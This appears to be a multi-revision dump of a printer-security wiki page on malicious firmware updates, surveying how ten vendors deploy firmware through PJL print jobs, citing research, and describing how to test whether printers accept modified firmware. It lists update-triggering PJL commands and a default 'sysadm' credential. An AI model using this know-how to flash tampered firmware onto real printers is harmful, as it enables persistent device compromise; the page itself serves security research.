LPROGRAMRIP</span> |- | prn || 25 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 18 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 3 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | ps || 2 || PostScript (title: ''Firmware Update'') |- | pjl || 1 || @PJL ENTER LANGUAGE=FLASH |- | rowspan="2" | Brother | djf || 79 || @PJL EXECUTE BRDOWNLOAD |- | blf || 9 || @PJL ENTER LANGUAGE=PCL |- | rowspan="2" | Lexmark | fls || 63 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | bin, fls || 6 || Unknown binary format |- | rowspan="2" | Samsung | hd || 33 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | fls, hd0 || 4 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | rowspan="10" | Xerox | ps || 36 || PostScript (title: ''Firmware Update'') |- | dlm || 35 || Xerox Dynamic Loadable Module |- | prn, bin || 20 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 16 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 10 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | bin || 10 || @PJL SET JOBATTR="@SWDL" |- | fls, hd, hde || 8 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH |- | pjl || 3 || @PJL FSDOWNLOAD [name].rpm |- | axf || 3 || RISC OS AIF executable |- | rowspan="3" | Ricoh | brn || 15 || @PJL FWDOWNLOAD… |- | bin || 14 || @PJL RSYSTEMUPDATE SIZE=… |- | fls || 4 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | rowspan="4" | Kyocera | cramfs, img || 98 || cramfs image |- | bin, squashfs || 79 || squashfs image |- | bin, kmmfp || 41 || u-boot legacy uImage |- | efi, kmpanel || 13 || proprietary image format |- | rowspan="4" | Konica Minolta | bin || 38 || unknown binary, additional checksum file |- | ps || 20 || PostScript (title: ''Softload printer modules'') |- | ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE |- | upg || 1 || @PJL ENTER LANGUAGE=UPGRADE |- |} '''How to test for this attack?''' The security of code signing is based on keeping the private key a long-term trade secret. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project. ''Other attack scenarios include:'' * Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version, which has known security weaknesses. * Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable). * Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547]. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 85f19346e179922fec493ca01d041e61af3639fb 193 192 2017-01-23T10:26:06Z Admin 1 wikitext text/x-wiki The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device. Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>. == Vendors == To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 56-58</ref>. The results are as follows. === HP === Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>. === Canon === Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number which to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’. === Epson === Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms. === Dell === Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information. === Brother === Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters, one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code> while nine <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms. === Lexmark === Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>. === Samsung === Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms. === Xerox === Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself. === Ricoh === The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>. === Kyocera === Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms. === Konica === Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure. == Results == Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however, is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below: {| class="wikitable" |- ! Vendor !! Extension !! Quantity !! File header or type |- | rowspan="2" | HP | rfu || 419 || @PJL UPGRADE SIZE=… |- | bdl || 206 || FutureSmart binary format |- | rowspan="3" | Epson | rcx || 49 || SEIKO EPSON EpsonNet Form |- | prn || 9 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | brn || 7 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | rowspan="6" | Dell | fls, fly || 30 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | prn || 25 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 18 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 3 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | ps || 2 || PostScript (title: ''Firmware Update'') |- | pjl || 1 || @PJL ENTER LANGUAGE=FLASH |- | rowspan="2" | Brother | djf || 79 || @PJL EXECUTE BRDOWNLOAD |- | blf || 9 || @PJL ENTER LANGUAGE=PCL |- | rowspan="2" | Lexmark | fls || 63 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | bin, fls || 6 || Unknown binary format |- | rowspan="2" | Samsung | hd || 33 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | fls, hd0 || 4 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | rowspan="10" | Xerox | ps || 36 || PostScript (title: ''Firmware Update'') |- | dlm || 35 || Xerox Dynamic Loadable Module |- | prn, bin || 20 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 16 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 10 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | bin || 10 || @PJL SET JOBATTR="@SWDL" |- | fls, hd, hde || 8 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH |- | pjl || 3 || @PJL FSDOWNLOAD [name].rpm |- | axf || 3 || RISC OS AIF executable |- | rowspan="3" | Ricoh | brn || 15 || @PJL FWDOWNLOAD… |- | bin || 14 || @PJL RSYSTEMUPDATE SIZE=… |- | fls || 4 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | rowspan="4" | Kyocera | cramfs, img || 98 || cramfs image |- | bin, squashfs || 79 || squashfs image |- | bin, kmmfp || 41 || u-boot legacy uImage |- | efi, kmpanel || 13 || proprietary image format |- | rowspan="4" | Konica Minolta | bin || 38 || unknown binary, additional checksum file |- | ps || 20 || PostScript (title: ''Softload printer modules'') |- | ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE |- | upg || 1 || @PJL ENTER LANGUAGE=UPGRADE |- |} '''How to test for this attack?''' The security of code signing is based on keeping the private key a long-term trade secret. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project. ''Other attack scenarios include:'' * Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version, which has known security weaknesses. * Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable). * Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547]. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- ee8423e7051d404f61e1375071114536b56e675c 192 2017-01-23T10:14:20Z Admin 1 Created page with "The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection f..." wikitext text/x-wiki The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security played a less important role and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device. Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>. == Vendors == To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 56-58</ref>. The results are as follows. === HP === Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>. === Canon === Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number which to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’. === Epson === Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms. === Dell === Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information. === Brother === Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters, one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code> while nine <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms. === Lexmark === Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>. === Samsung === Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms. === Xerox === Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself. === Ricoh === The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>. === Kyocera === Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms. === Konica === Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure. == Results == Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however, is hard as no reasoned statement on the individual manufacturers' protection mechanisms can be made. An in-depth analysis of firmware modification attacks should be part of future academic research. A summary of file headers or types for all obtained firmware files is given below: {| class="wikitable" |- ! Vendor !! Extension !! Quantity !! File header or type |- | rowspan="2" | HP | rfu || 419 || @PJL UPGRADE SIZE=… |- | bdl || 206 || FutureSmart binary format |- | rowspan="3" | Epson | rcx || 49 || SEIKO EPSON EpsonNet Form |- | prn || 9 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | brn || 7 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | rowspan="6" | Dell | fls, fly || 30 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | prn || 25 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 18 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 3 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | ps || 2 || PostScript (title: ''Firmware Update'') |- | pjl || 1 || @PJL ENTER LANGUAGE=FLASH |- | rowspan="2" | Brother | djf || 79 || @PJL EXECUTE BRDOWNLOAD |- | blf || 9 || @PJL ENTER LANGUAGE=PCL |- | rowspan="2" | Lexmark | fls || 63 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | bin, fls || 6 || Unknown binary format |- | rowspan="2" | Samsung | hd || 33 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | fls, hd0 || 4 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | rowspan="10" | Xerox | ps || 36 || PostScript (title: ''Firmware Update'') |- | dlm || 35 || Xerox Dynamic Loadable Module |- | prn, bin || 20 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 16 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 10 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | bin || 10 || @PJL SET JOBATTR="@SWDL" |- | fls, hd, hde || 8 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH |- | pjl || 3 || @PJL FSDOWNLOAD [name].rpm |- | axf || 3 || RISC OS AIF executable |- | rowspan="3" | Ricoh | brn || 15 || @PJL FWDOWNLOAD… |- | bin || 14 || @PJL RSYSTEMUPDATE SIZE=… |- | fls || 4 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | rowspan="4" | Kyocera | cramfs, img || 98 || cramfs image |- | bin, squashfs || 79 || squashfs image |- | bin, kmmfp || 41 || u-boot legacy uImage |- | efi, kmpanel || 13 || proprietary image format |- | rowspan="4" | Konica Minolta | bin || 38 || unknown binary, additional checksum file |- | ps || 20 || PostScript (title: ''Softload printer modules'') |- | ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE |- | upg || 1 || @PJL ENTER LANGUAGE=UPGRADE |- |} '''How to test for this attack?''' The security of code signing is based on keeping the private key a long-term trade secret. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, you can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or 